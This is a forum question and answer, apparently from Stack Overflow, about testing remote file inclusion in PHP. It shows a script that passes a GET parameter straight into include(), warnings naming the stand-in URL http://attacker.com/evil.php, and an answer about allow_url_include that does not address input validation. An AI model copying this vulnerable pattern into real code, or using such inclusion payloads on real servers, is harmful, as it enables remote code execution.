0

I have an issue. I was testing how remote file inclusion injection and tried to include the file from URL query string using PHP. But here I am getting some warning messages. I am explaining my code below.

<?php
$file = $_GET['file'];
include($file);
?>

I am getting the following messages.

Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /opt/lampp/htdocs/test/remote.php on line 3

Warning: include(http://attacker.com/evil.php): failed to open stream: no suitable wrapper could be found in /opt/lampp/htdocs/test/remote.php on line 3

Warning: include(): Failed opening 'http://attacker.com/evil.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/test/remote.php on line 3

Here I am calling remote file like this http://localhost/test/remote.php?file=http://kooleedback.com/about.php. Here I need to know how it can be successfully included and also how it can be prevented.

Improve this question

1 Answer 1

Reset to default
4

Your server has the allow_url_include option disabled. This means you can only access local files with include(), not external URLs.

In general it doesn't make sense to use include() with a remote .php URL. When you request a .php file from a server, it doesn't return the source code, it executes the script and returns the output. But include() needs to get PHP code, which it executes as if it were in the including script.

If you want to get that remote data you should use file_get_contents($file), not include($file).

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

Yes, after implementing as per you the messages gone bit where it is including i can not know.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.